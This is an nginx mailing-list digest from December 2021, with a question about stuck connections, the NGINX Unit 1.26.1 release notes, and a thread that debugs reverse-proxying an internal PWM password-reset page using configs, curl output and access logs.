From nataha1910 at mail.ru Thu Dec 2 10:50:38 2021
From: nataha1910 at mail.ru (Natalya Puchkova)
Date: Thu, 02 Dec 2021 13:50:38 +0300
Subject: No subject
Message-ID: <1638442238.722407988@f556.i.mail.ru>

Hi all,

I have run into a problem: when the Internet or VPN connection is lost while a user is on our site, the connection gets stuck in the writing state and never disappears. I assume that nginx does not detect that the connection has been interrupted.
Has anyone encountered a similar situation? Maybe you know how to solve it (for example, by adding some setting to the configuration)?

Thanks,
Natalya
-------------- next part --------------
An HTML attachment was scrubbed...
URL: 
From nataha1910 at mail.ru Thu Dec 2 13:30:57 2021
From: nataha1910 at mail.ru (Natalya Puchkova)
Date: Thu, 02 Dec 2021 16:30:57 +0300
Subject: Growing Writing Connections
In-Reply-To: 
References: 
Message-ID: <1638451857.317872221@f377.i.mail.ru>

Hi all,

I have run into a problem: when the Internet or VPN connection is lost while a user is on our site, the connection gets stuck in the writing state and never disappears. I assume that nginx does not detect that the connection has been interrupted.
Has anyone encountered a similar situation? Maybe you know how to solve it (for example, by adding some setting to the configuration)?

Thanks,
Natalya

> Thursday, 2 December 2021, 15:00 +03:00 from nginx-request at nginx.org:
> [...]
> End of nginx Digest, Vol 146, Issue 2
> *************************************

----------------------------------------------------------------------

Regards,
Natalya Puchkova
-------------- next part --------------
An HTML attachment was scrubbed... 
URL: From mdounin at mdounin.ru Thu Dec 2 14:03:22 2021 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 2 Dec 2021 17:03:22 +0300 Subject: Growing Writing Connections In-Reply-To: <1638451857.317872221@f377.i.mail.ru> References: <1638451857.317872221@f377.i.mail.ru> Message-ID: Hello! On Thu, Dec 02, 2021 at 04:30:57PM +0300, ??????? ??????? wrote: > I faced a problem that when there is a connection and the > Internet or?VPN is disconnected while user on our site, the > connection gets stuck in the writing state and does not > disappear anymore. I am assuming that nginx does not detect that > the connection has been interrupted. > Has anyone encountered a similar situation? Maybe you know how > to solve it (for example, add some setting in the > configuration)? The connection is expected to be closed once the relevant timeout expires or the TCP layer detects that the connection is no longer alive. Usually the send_timeout applies. If you see connections which are stuck for much longer than configured timeouts, this might indicate you are facing a socket leak somewhere. Usually such connections can be also seen as "CLOSED" or "CLOSE_WAIT" in netstat output. In this case first of all I would recommend to make sure you are using a recent enough nginx version, at least 1.20.2 or 1.21.4. -- Maxim Dounin http://mdounin.ru/ From vbart at nginx.com Thu Dec 2 19:23:45 2021 From: vbart at nginx.com (Valentin V. Bartenev) Date: Thu, 02 Dec 2021 22:23:45 +0300 Subject: Unit 1.26.1 release Message-ID: <5771846.lOV4Wx5bFT@vbart-laptop> Hi, I'm glad to announce a new release of NGINX Unit. This is a minor bugfix release that aims to eliminate some annoying regressions revealed after the release of Unit 1.26.0 two weeks ago. Notably, the shared OPcache implementation in that release required introducing some major architectural changes, but our functional tests didn't catch some regressions caused by these changes. Still, thanks to our active community, the issues were reported shortly after the release, and now we can provide an updated version. We will also improve our functional testing to avoid such regressions in the future. The most painful and visible one was that sometimes Unit daemon couldn't completely exit, leaving some zombie processes. However, the second attempt to stop it always succeeded. Also, some DragonFly BSD kernel interfaces are seemingly broken, preventing the Unit daemon from functioning, so we disabled their use when compiling for DragonFly BSD. Changes with Unit 1.26.1 02 Dec 2021 *) Bugfix: occasionally, the Unit daemon was unable to fully terminate; the bug had appeared in 1.26.0. *) Bugfix: a prototype process could crash on an application process exit; the bug had appeared in 1.26.0. *) Bugfix: the router process crashed on reconfiguration if "access_log" was configured without listeners. *) Bugfix: a segmentation fault occurred in the PHP module if chdir() or fastcgi_finish_request() was called in the OPcache preloading script. *) Bugfix: fatal errors on DragonFly BSD; the bug had appeared in 1.26.0. To know more about the bunch of changes introduced in Unit 1.26 and the roadmap for 1.27, please see the previous announcement: - https://mailman.nginx.org/pipermail/unit/2021-November/000288.html Thank you again for keeping your finger on the pulse, reporting issues and submitting feature requests via our GitHub issue tracker: - https://github.com/nginx/unit/issues Stay tuned! wbr, Valentin V. 
Bartenev From nginx-forum at forum.nginx.org Fri Dec 3 12:37:27 2021 From: nginx-forum at forum.nginx.org (agomes) Date: Fri, 03 Dec 2021 07:37:27 -0500 Subject: Internal application - Publish on nginx Message-ID: <9b68f68b3058cf2ce645125a89375277.NginxMailingListEnglish@forum.nginx.org> Hi people. I am configuring Nginx to publish my Internal portal. My portal is hosted on my server https://x.x.x.x:8443 the principal url of this protal is https://x.x.x.x:8443/pwm/private/login. This URL I don't need to publish. inside this portal I have another URL that I would like to publish. see below. https://x.x.x.x:8443/pwm/public/forgottenpassword I've tried to use the configuration below. ##########################NGINX CONFIGURATION######################### upstream myapp { server x.x.x.x:8443; } server { server_tokens off; modsecurity on; modsecurity_rules_file /etc/nginx/modsec/main.conf; listen 443 ssl; listen 80; server_name x.x.x.x.com; ssl_prefer_server_ciphers On; ssl_protocols TLSv1.2 TLSv1.3; ssl_ciphers AES256+EECDH:AES256+EDH:!aNULL; # security headers add_header X-Frame-Options "SAMEORIGIN" always; add_header X-XSS-Protection "1; mode=block" always; add_header X-Content-Type-Options "nosniff" always; add_header Referrer-Policy "no-referrer-when-downgrade" always; add_header Content-Security-Policy "default-src * data: 'unsafe-eval' 'unsafe-inline'" always; add_header Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" always; ssl_certificate /etc/nginx/ssl/wildcard-fullchain.pem; # wildcard ca full chain certificate ssl_certificate_key /etc/nginx/ssl/wildcard-key.pem; # wildcard private certificate client_max_body_size 5M; root /var/www/; index index.html; if ($scheme != "https") { rewrite ^ https://$http_host$request_uri? permanent; } location ^~ /.well-known/pki-validation/ { allow all; root /var/www/; default_type "text/plain"; try_files $uri =404; } location /app { proxy_pass https://myapp/pwm/public/forgottenpassword; #rewrite ^/(.*)/pwm/public$ /$1 break; proxy_redirect default; proxy_set_header Host $host; } access_log /var/log/nginx/access.log myAccess; error_log /var/log/nginx/error.log; } ##########################END CONFIGURATION#################### When I do this, the /app does not work but when try internally the address https://x.x.x.x:8443/pwm/public/forgottenpassword it works like expected. I am working on this for a long time without any result. Thank you in advance for the help. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,292998,292998#msg-292998 From francis at daoine.org Fri Dec 3 13:35:05 2021 From: francis at daoine.org (Francis Daly) Date: Fri, 3 Dec 2021 13:35:05 +0000 Subject: Internal application - Publish on nginx In-Reply-To: <9b68f68b3058cf2ce645125a89375277.NginxMailingListEnglish@forum.nginx.org> References: <9b68f68b3058cf2ce645125a89375277.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20211203133505.GS12557@daoine.org> On Fri, Dec 03, 2021 at 07:37:27AM -0500, agomes wrote: Hi there, > location /app { > proxy_pass https://myapp/pwm/public/forgottenpassword; > #rewrite ^/(.*)/pwm/public$ /$1 break; > proxy_redirect default; > proxy_set_header Host $host; > } > > > access_log /var/log/nginx/access.log myAccess; > error_log /var/log/nginx/error.log; > } > > ##########################END CONFIGURATION#################### > > When I do this, the /app does not work but when try internally the address > https://x.x.x.x:8443/pwm/public/forgottenpassword it works like expected. 
What response do you get when you do curl -v https://x.x.x.x.com/app ? If that is not the response that you want -- what response do you want instead? I suspect that your "forgottenpassword" application might use more than one url, and what the client gets when it makes the first request may not let it get the other urls. f -- Francis Daly francis at daoine.org From nginx-forum at forum.nginx.org Fri Dec 3 14:02:29 2021 From: nginx-forum at forum.nginx.org (agomes) Date: Fri, 03 Dec 2021 09:02:29 -0500 Subject: Internal application - Publish on nginx In-Reply-To: <20211203133505.GS12557@daoine.org> References: <20211203133505.GS12557@daoine.org> Message-ID: <938ccfdf16d36eb64262ab8d9cce54e6.NginxMailingListEnglish@forum.nginx.org> Hi there, follow the command curl -v. ####################################################### curl -v https://x.x.x.x.com/app * Trying x.x.x.x:443... * Connected to x.x.x.x (x.x.x.x) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * successfully set certificate verify locations: * CAfile: /etc/ssl/certs/ca-certificates.crt * CApath: /etc/ssl/certs * TLSv1.3 (OUT), TLS handshake, Client hello (1): * TLSv1.3 (IN), TLS handshake, Server hello (2): * TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8): * TLSv1.3 (IN), TLS handshake, Certificate (11): * TLSv1.3 (IN), TLS handshake, CERT verify (15): * TLSv1.3 (IN), TLS handshake, Finished (20): * TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1): * TLSv1.3 (OUT), TLS handshake, Finished (20): * SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 * ALPN, server accepted to use http/1.1 * Server certificate: * subject: CN=*.x.x.x.x * start date: Mar 31 00:00:00 2021 GMT * expire date: Mar 31 23:59:59 2022 GMT * subjectAltName: host "x.x.x.x" matched cert's "*.x.x.x.x" * issuer: x.x.x.x * SSL certificate verify ok. > GET /app HTTP/1.1 > Host: x.x.x.x > User-Agent: curl/7.74.0 > Accept: */* > * TLSv1.3 (IN), TLS handshake, Newsession Ticket (4): * TLSv1.3 (IN), TLS handshake, Newsession Ticket (4): * old SSL session ID is stale, removing * Mark bundle as not supporting multiuse < HTTP/1.1 302 < Server: nginx < Date: Fri, 03 Dec 2021 13:58:45 GMT < Content-Length: 0 < Connection: keep-alive < Vary: Accept-Encoding < Set-Cookie: JSESSIONID=40D508FAD9443C32B4BB3AE5C6AA9E36; Path=/pwm; Secure; HttpOnly; SameSite=Strict < X-PWM-SessionID: x9aPS < Content-Language: en < X-PWM-Noise: 9CCa2PcrE3K2iIpfivfwJuAauf0E81BtclX2NuODNc6hJ3UvdgjJ9PyH6xrV < X-Content-Type-Options: nosniff < X-XSS-Protection: 1 < X-PWM-Instance: 7D0720A46A762638 < X-Frame-Options: DENY < X-PWM-Amb: Bite my shiny metal password! 
< Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate < Content-Security-Policy: default-src 'self'; object-src 'none'; img-src 'self' data:; style-src 'self' 'unsafe-inline'; script-src https://www.recaptcha.net/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.google.com/recaptcha/ 'self' 'unsafe-eval' 'nonce-QXHDJS9TCiIEqqEULQJOsSfFYsEGwoXs'; frame-src https://www.recaptcha.net/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.google.com/recaptcha/ ; report-uri /pwm/public/api?processAction=cspReport < Location: /pwm/public/forgottenpasswordapp?stickyRedirectTest=key < Set-Cookie: ID=3fajhL8QWt9TNKBTc8BQVdvqVxf7IZXOkwqt8unh; Path=/pwm/; Secure; HttpOnly; SameSite=Strict < Set-Cookie: SESSION=H4sIAAAAAAAAAAHLADT_UFdNLkdDTTEQoiWD0ScsDFgNWID788sIL4HXjWo_YbPGxoz_YStjhza8y-hWdTZA5I_UIGSjh54nEgqZmD_JeAiCikLARxHsW1PHRfIp9TfZF05dFqS0WgexsO0TfddkcqT0etZ0_GTmv4xPLCvlRZGwAho9FxYhdIbTeKTUXubNuR0rbluWtWpHwdPHzz5G8u3i_AlRD6vwOZsldN3TVrTCaKgA-uKwykb1BVTdAu5zOg2Yg-LT2oFKupk2TWvoLwV6AG-cetJeZkA1kK_oywAAAA%3D%3D; Path=/pwm/; Secure; HttpOnly; SameSite=Strict < X-Frame-Options: SAMEORIGIN < X-XSS-Protection: 1; mode=block < X-Content-Type-Options: nosniff < Referrer-Policy: no-referrer-when-downgrade < Content-Security-Policy: default-src * data: 'unsafe-eval' 'unsafe-inline' < Strict-Transport-Security: max-age=31536000; includeSubDomains; preload < * Connection #0 to x.x.x.x left intact root at ubuntu-server:/home/agomes# Posted at Nginx Forum: https://forum.nginx.org/read.php?2,292998,293003#msg-293003 From francis at daoine.org Fri Dec 3 14:32:58 2021 From: francis at daoine.org (Francis Daly) Date: Fri, 3 Dec 2021 14:32:58 +0000 Subject: Internal application - Publish on nginx In-Reply-To: <938ccfdf16d36eb64262ab8d9cce54e6.NginxMailingListEnglish@forum.nginx.org> References: <20211203133505.GS12557@daoine.org> <938ccfdf16d36eb64262ab8d9cce54e6.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20211203143258.GT12557@daoine.org> On Fri, Dec 03, 2021 at 09:02:29AM -0500, agomes wrote: Hi there, > follow the command curl -v. Thanks for this. > > GET /app HTTP/1.1 > < HTTP/1.1 302 > < Location: /pwm/public/forgottenpasswordapp?stickyRedirectTest=key > < Set-Cookie: ID=3fajhL8QWt9TNKBTc8BQVdvqVxf7IZXOkwqt8unh; Path=/pwm/; Secure; HttpOnly; SameSite=Strict So your upstream redirected to /pwm/public/forgottenpasswordapp?stickyRedirectTest=key and wanted to set some cookies with Path=/pwm/. And nginx passed those through to the client -- so your nginx logs will probably show the "normal" client making a request for /pwm/public/forgottenpasswordapp?stickyRedirectTest=key, which will get an error response because you don't have a file /var/www/pwm/public/forgottenpasswordapp. proxy_redirect can be used to change the first of those. proxy_cookie_path can be used to change the second, sort of. You did set "proxy_redirect default;", but that does not catch the no-host Location response in this case. So, I suggest: * use proxy_redirect /pwm/public/forgottenpasswordapp /app; and repeat the "curl"; you should see either "Location: /app?sticky..." or "Location: https://x.x.x.com/app?sticky...". If you do, then repeat the "curl" with the "?sticky..." part attached. I *suspect* that second request will indicate a "missing cookie" failure. You can then try to access /app in your browser, and see what that does -- if it also indicates the "missing cookie" failure, then you decide how to "fix" the cookies. 
If you are happy for the cookie to potentially be sent to anything on your x.x.x.com server, then proxy_cookie_path /pwm/ /; may work. Maybe "/app" and the end could work too -- it does depend on what else the upstream app might send. (The upstream app is entirely below /pwm/; the front-end version is not below /app/ (trailing slash); so it is not trivial to map between the two.) Good luck with it, f -- Francis Daly francis at daoine.org From nginx-forum at forum.nginx.org Fri Dec 3 15:05:57 2021 From: nginx-forum at forum.nginx.org (agomes) Date: Fri, 03 Dec 2021 10:05:57 -0500 Subject: Internal application - Publish on nginx In-Reply-To: <20211203143258.GT12557@daoine.org> References: <20211203143258.GT12557@daoine.org> Message-ID: <8656bc9d7d3ff8c7cf373a8e67936d99.NginxMailingListEnglish@forum.nginx.org> Hi Francis, I really appreciate your help. in my location /app I have this configuration. location /app { proxy_pass https://resetpass/pwm/public/forgottenpasswordapp; #rewrite ^/(.*)/pwm/public$ /$1 break; proxy_redirect /pwm/public/forgottenpasswordapp /app; #proxy_set_header Host $host; } when I run the curl -v command I have this output. ################################ root at ubuntu-server:/home/agomes# curl -v https://x.x.x.x/app * Trying 65.39.150.151:443... * Connected to x.x.x.x (x.x.x.x) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * successfully set certificate verify locations: * CAfile: /etc/ssl/certs/ca-certificates.crt * CApath: /etc/ssl/certs * TLSv1.3 (OUT), TLS handshake, Client hello (1): * TLSv1.3 (IN), TLS handshake, Server hello (2): * TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8): * TLSv1.3 (IN), TLS handshake, Certificate (11): * TLSv1.3 (IN), TLS handshake, CERT verify (15): * TLSv1.3 (IN), TLS handshake, Finished (20): * TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1): * TLSv1.3 (OUT), TLS handshake, Finished (20): * SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 * ALPN, server accepted to use http/1.1 * Server certificate: * subject: CN=*.x.x.x.x * start date: Mar 31 00:00:00 2021 GMT * expire date: Mar 31 23:59:59 2022 GMT * subjectAltName: host "x.x.x.x" matched cert's "*.x.x.x.x" * issuer: xxxxx * SSL certificate verify ok. 
> GET /app HTTP/1.1 > Host: x.x.x.x > User-Agent: curl/7.74.0 > Accept: */* > * TLSv1.3 (IN), TLS handshake, Newsession Ticket (4): * TLSv1.3 (IN), TLS handshake, Newsession Ticket (4): * old SSL session ID is stale, removing * Mark bundle as not supporting multiuse < HTTP/1.1 302 < Server: nginx < Date: Fri, 03 Dec 2021 15:01:45 GMT < Content-Length: 0 < Location: https://x.x.x.x/app?stickyRedirectTest=key < Connection: keep-alive < Vary: Accept-Encoding < Set-Cookie: JSESSIONID=D70474FE95784C0A07C659A05D224233; Path=/pwm; Secure; HttpOnly; SameSite=Strict < X-PWM-SessionID: YXAYQ < Content-Language: en < X-PWM-Noise: VTRHPaZo4u06vSjXq956ujfN1G2s1Y < X-Content-Type-Options: nosniff < X-XSS-Protection: 1 < X-PWM-Instance: 7D0720A46A762638 < X-Frame-Options: DENY < X-PWM-Amb: in the future, you'll just /think/ your password < Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate < Content-Security-Policy: default-src 'self'; object-src 'none'; img-src 'self' data:; style-src 'self' 'unsafe-inline'; script-src https://www.recaptcha.net/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.google.com/recaptcha/ 'self' 'unsafe-eval' 'nonce-vSpzMNrxkvmBUtzLvNHnmxbEQREymvtV'; frame-src https://www.recaptcha.net/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.google.com/recaptcha/ ; report-uri /pwm/public/api?processAction=cspReport < Set-Cookie: ID=yiElg4A1ZZXYfaMTaNsCOzLDDq1v6xtYkwqvhuxh; Path=/pwm/; Secure; HttpOnly; SameSite=Strict < Set-Cookie: SESSION=H4sIAAAAAAAAAAHLADT_UFdNLkdDTTEQoiWD0ScsDFgNWID788sONPQqGgXG0dbsSPDwD0jaK588y_9z6aL9Zy8cRnp56mjEjt6iDZIEy4ihINlmcYFVSicYNMuIBrM68x2hbaGTMZHi_K-Mk2OjegRLtQLipXqKjZe_ylyMkmtuZDYicv9bhoQaOe1VtblF2khZUf9gNzJ2If0mW_nIOci5vR3EeonJNbnh-tjBx4GATIo46jwalNfr2BvPQrgbdb-t74Pz0i1rGyQ-2CaGOLGJIPUhWckgZZh-WTxzywAAAA%3D%3D; Path=/pwm/; Secure; HttpOnly; SameSite=Strict < X-Frame-Options: SAMEORIGIN < X-XSS-Protection: 1; mode=block < X-Content-Type-Options: nosniff < Referrer-Policy: no-referrer-when-downgrade < Content-Security-Policy: default-src * data: 'unsafe-eval' 'unsafe-inline' < Strict-Transport-Security: max-age=31536000; includeSubDomains; preload < * Connection #0 to host x.x.x.x left intact ###################### In the browser bar I have this https://x.x.x.x/app?stickyRedirectTest=key internally on the application everhthing works very well. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,292998,293005#msg-293005 From francis at daoine.org Fri Dec 3 15:59:39 2021 From: francis at daoine.org (Francis Daly) Date: Fri, 3 Dec 2021 15:59:39 +0000 Subject: Internal application - Publish on nginx In-Reply-To: <8656bc9d7d3ff8c7cf373a8e67936d99.NginxMailingListEnglish@forum.nginx.org> References: <20211203143258.GT12557@daoine.org> <8656bc9d7d3ff8c7cf373a8e67936d99.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20211203155939.GU12557@daoine.org> On Fri, Dec 03, 2021 at 10:05:57AM -0500, agomes wrote: Hi there, > in my location /app I have this configuration. > > location /app { > proxy_pass https://resetpass/pwm/public/forgottenpasswordapp; > #rewrite ^/(.*)/pwm/public$ /$1 break; > proxy_redirect /pwm/public/forgottenpasswordapp /app; > #proxy_set_header Host $host; > } > > when I run the curl -v command I have this output. 
> > root at ubuntu-server:/home/agomes# curl -v https://x.x.x.x/app > < Location: https://x.x.x.x/app?stickyRedirectTest=key > < Set-Cookie: JSESSIONID=D70474FE95784C0A07C659A05D224233; Path=/pwm; > < Set-Cookie: ID=yiElg4A1ZZXYfaMTaNsCOzLDDq1v6xtYkwqvhuxh; Path=/pwm/; > > In the browser bar I have this https://x.x.x.x/app?stickyRedirectTest=key > > internally on the application everhthing works very well. The proxy_redirect has changed the Location: response, which is good. What does curl -v https://x.x.x.x/app?stickyRedirectTest=key return? Can you see in your browser "developer tools console" what series of requests and responses are made when things work using the internal system directly; and how far in that sequence does it get when you go through nginx? I suggest trying (in the short term, at least) proxy_cookie_path ~^/pwm.* /app; in the same location{} block, and seeing if that makes any useful change to the response when the browser goes through nginx. Cheers, f -- Francis Daly francis at daoine.org From nginx-forum at forum.nginx.org Fri Dec 3 16:34:56 2021 From: nginx-forum at forum.nginx.org (agomes) Date: Fri, 03 Dec 2021 11:34:56 -0500 Subject: Internal application - Publish on nginx In-Reply-To: <20211203155939.GU12557@daoine.org> References: <20211203155939.GU12557@daoine.org> Message-ID: Hi Francis, Follow the curl -v ####################### root at ubuntu-server:/home/agomes# curl -v https://x.x.x.x/app?stickyRedirectTest=key * Trying x.x.x.x:443... * Connected to x.x.x.x (x.x.x.x) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * successfully set certificate verify locations: * CAfile: /etc/ssl/certs/ca-certificates.crt * CApath: /etc/ssl/certs * TLSv1.3 (OUT), TLS handshake, Client hello (1): * TLSv1.3 (IN), TLS handshake, Server hello (2): * TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8): * TLSv1.3 (IN), TLS handshake, Certificate (11): * TLSv1.3 (IN), TLS handshake, CERT verify (15): * TLSv1.3 (IN), TLS handshake, Finished (20): * TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1): * TLSv1.3 (OUT), TLS handshake, Finished (20): * SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 * ALPN, server accepted to use http/1.1 * Server certificate: * subject: CN=*.x.x.x.x.com * start date: Mar 31 00:00:00 2021 GMT * expire date: Mar 31 23:59:59 2022 GMT * subjectAltName: host "x.x.x.x.com" matched cert's "*.x.x.x.x.com" * issuer: x.x.x.x * SSL certificate verify ok. 
> GET /app?stickyRedirectTest=key HTTP/1.1 > Host: x.x.x.x.com > User-Agent: curl/7.74.0 > Accept: */* > * TLSv1.3 (IN), TLS handshake, Newsession Ticket (4): * TLSv1.3 (IN), TLS handshake, Newsession Ticket (4): * old SSL session ID is stale, removing * Mark bundle as not supporting multiuse < HTTP/1.1 302 < Server: nginx < Date: Fri, 03 Dec 2021 16:19:30 GMT < Content-Length: 0 < Location: https://x.x.x.x/app < Connection: keep-alive < Vary: Accept-Encoding < Set-Cookie: JSESSIONID=AAB544EAB8D7EB2ADBC1A6586A8488C0; Path=/pwm; Secure; HttpOnly; SameSite=Strict < X-PWM-SessionID: bD04y < Content-Language: en < X-PWM-Noise: vhz2n6pAC3u4HK4iUMn9rckjReGEH < X-Content-Type-Options: nosniff < X-XSS-Protection: 1 < X-PWM-Instance: 7D0720A46A762638 < X-Frame-Options: DENY < X-PWM-Amb: if its broke, it's krowten's fault < Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate < Content-Security-Policy: default-src 'self'; object-src 'none'; img-src 'self' data:; style-src 'self' 'unsafe-inline'; script-src https://www.recaptcha.net/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.google.com/recaptcha/ 'self' 'unsafe-eval' 'nonce-S4MPinwLctwCgOvE3YkfzXDu5ieb6yCh'; frame-src https://www.recaptcha.net/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.google.com/recaptcha/ ; report-uri /pwm/public/api?processAction=cspReport < Set-Cookie: ID=1NB7WIPZ99tarLf4xpYH6OdYOVV8mbjpkwqy9utk; Path=/pwm/; Secure; HttpOnly; SameSite=Strict < Set-Cookie: SESSION=H4sIAAAAAAAAAAHLADT_UFdNLkdDTTEQoiWD0ScsDFgNWID788sURuVmAvS5EFkHh6_Z_SUXKTh_OPP34r6bZ2qCbzkXniGokm0POG_z-xEnuaILx79beMlnrLdzSslwzEIleeZG3Ld4XCtX-GdampE4X-jSo1EnDSvIwg2okbpn32JF-9mpJ-Mor-tpWmEe3eW3-deUeJ2VuPX_EbLdXmKjDpzlhWxknh3nVitS9jtqV4v4PRspwJ5PnKBmoeOdNVnoi3-hblN5gBpNyP0lLQV5DsQ85N9FodJW45e2ywAAAA%3D%3D; Path=/pwm/; Secure; HttpOnly; SameSite=Strict < X-Frame-Options: SAMEORIGIN < X-XSS-Protection: 1; mode=block < X-Content-Type-Options: nosniff < Referrer-Policy: no-referrer-when-downgrade < Content-Security-Policy: default-src * data: 'unsafe-eval' 'unsafe-inline' < Strict-Transport-Security: max-age=31536000; includeSubDomains; preload < * Connection #0 to host c360-lab.isecurityconsulting.com left intact ################## When I try to use proxy_cookie_path ~^/pwm.* /app; in the location. (see below) location /app { proxy_pass https://resetpass/pwm/public/forgottenpasswordapp; #rewrite ^/(.*)/pwm/public$ /$1 break; proxy_redirect /pwm/public/forgottenpasswordapp /app; #proxy_set_header Host $host; proxy_cookie_path ~^/pwm.* /app; } I've got some stranges carachteres on the web page. And in the deve tools in the browser, internally I have a lot of connections to the uri https://x.x.x.x:8443/pwm/public/resources I think that I need to appoint this path in somewhere in the nginx config. 
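Maybe something like this would pass those resource requests through as well? Just an untested guess on my side, reusing the same upstream:

location /pwm/public/resources {
    # no URI part on proxy_pass, so the original /pwm/public/resources/... path is forwarded as-is
    proxy_pass https://resetpass;
}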
Posted at Nginx Forum: https://forum.nginx.org/read.php?2,292998,293007#msg-293007 From nginx-forum at forum.nginx.org Fri Dec 3 17:57:06 2021 From: nginx-forum at forum.nginx.org (agomes) Date: Fri, 03 Dec 2021 12:57:06 -0500 Subject: Internal application - Publish on nginx In-Reply-To: References: <20211203155939.GU12557@daoine.org> Message-ID: <660c1368b9068e8129e77debb3c6fb63.NginxMailingListEnglish@forum.nginx.org> Hi, Now my configuration is like below: location /app/ { proxy_pass https://myappp; #rewrite ^/(.*)/pwm/public$ /$1 break; proxy_redirect https://resetpass/pwm/public/forgottenpassword /app/; #proxy_set_header Host $host; #proxy_cookie_path ~^/pwm/* /app; } location /pwm { proxy_pass https://myappp; proxy_redirect default; proxy_set_header Host $host; } =============================== I can see on the access logs that the connection is going to resources path correctly, but the page still not appears to me. I've got this message. Error Password Self Service PWM Error PWM 5025 Maximum login attempts for this session have been exceeded. Try again later. Idle Timeout: 5 minutes =================== Follow the logs. [03/Dec/2021:17:54:28 +0000] "x.x.x.x" "GET /app/ HTTP/1.1" 200 104 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" "x.x.x.x:8443" 0.007 0.008 "0.88" [03/Dec/2021:17:54:28 +0000] "x.x.x.x" "GET /pwm HTTP/1.1" 302 5 "x.x.x.x/app/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" "x.x.x.x:8443" 0.005 0.004 "-" [03/Dec/2021:17:54:28 +0000] "x.x.x.x" "GET /pwm/ HTTP/1.1" 200 1430 "x.x.x.x/app/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" "x.x.x.x:8443" 0.011 0.008 "-" [03/Dec/2021:17:54:28 +0000] "x.x.x.x" "GET /pwm/public/resources/nonce-135vkyu/pwm-icons.css HTTP/1.1" 200 1549 "x.x.x.x/pwm/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" "x.x.x.x:8443" 0.005 0.004 "2.63" [03/Dec/2021:17:54:29 +0000] "x.x.x.x" "GET /pwm/public/resources/nonce-135vkyu/style.css HTTP/1.1" 200 1549 "x.x.x.x/pwm/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" "x.x.x.x:8443" 0.009 0.008 "2.63" [03/Dec/2021:17:54:29 +0000] "x.x.x.x" "GET /pwm/public/resources/nonce-135vkyu/js/main.js HTTP/1.1" 200 1550 "x.x.x.x/pwm/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" "x.x.x.x:8443" 0.008 0.008 "2.62" [03/Dec/2021:17:54:29 +0000] "x.x.x.x" "GET /pwm/public/resources/nonce-135vkyu/webjars/dojo/dojo.js HTTP/1.1" 200 1549 "x.x.x.x/pwm/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" "x.x.x.x:8443" 0.008 0.008 "2.63" [03/Dec/2021:17:54:29 +0000] "x.x.x.x" "GET /pwm/public/resources/nonce-135vkyu/themes/pwm/style.css HTTP/1.1" 200 1549 "x.x.x.x/pwm/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" "x.x.x.x:8443" 0.013 0.016 "2.63" [03/Dec/2021:17:54:29 +0000] "x.x.x.x" "GET /pwm/public/resources/nonce-135vkyu/mobileStyle.css HTTP/1.1" 200 1550 "x.x.x.x/pwm/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
